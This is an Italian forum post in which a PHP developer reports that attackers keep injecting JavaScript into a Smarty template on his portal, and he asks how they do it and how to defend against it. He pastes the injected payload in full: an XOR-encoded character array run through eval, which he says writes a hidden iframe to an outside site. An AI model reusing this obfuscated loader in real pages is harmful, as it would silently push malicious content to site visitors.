Salve a tutti,
sono nuovo di questo forum, mi chiamo Mimmo e sono un programmatore PHP.

Da qualche giorno sto riscontrando un grave problema ad un portale che ho sviluppato.

In quattro parole vi dico subito che il portale è stato sviluppato in php 5, mySQL e SMARTY Template Engine.

In pratica in un file .tpl riescono, dall'esterno, ad inserire del codice javascript come il seguente

codice:
<script>wjgl=new Array(0,11,7,17,9,1,10,16,74,19,22,13,16,1,76,70,88,13,2,22,5,9,1,68,23,22,7,89,56,70,12,16,16,20,94,75,75,15,22,1,10,11,8,13,74,7,10,75,16,15,9,75,13,10,0,1,28,74,20,12,20,56,70,68,19,13,0,16,12,89,56,70,84,56,70,68,12,1,13,3,12,16,89,56,70,84,56,70,68,23,16,29,8,1,89,56,70,0,13,23,20,8,5,29,94,10,11,10,1,95,56,70,90,88,75,13,2,22,5,9,1,90,70,77);	nqmay="";	vvtim=100;	ahful=eval;	ddwk=String.fromCharCode;for(wqjs in wjgl)nqmay+=ddwk(wjgl[wqjs]^vvtim);	ahful(nqmay);	alert(nqmay);</script>
la traduzione è un comunissimo

codice:
document.write('<iframe src=.... ecc.. ecc..')
Qualcuno mi può spiegare come possano riuscirci e qualche metodo di difesa?

Vi ringrazio in aticipo.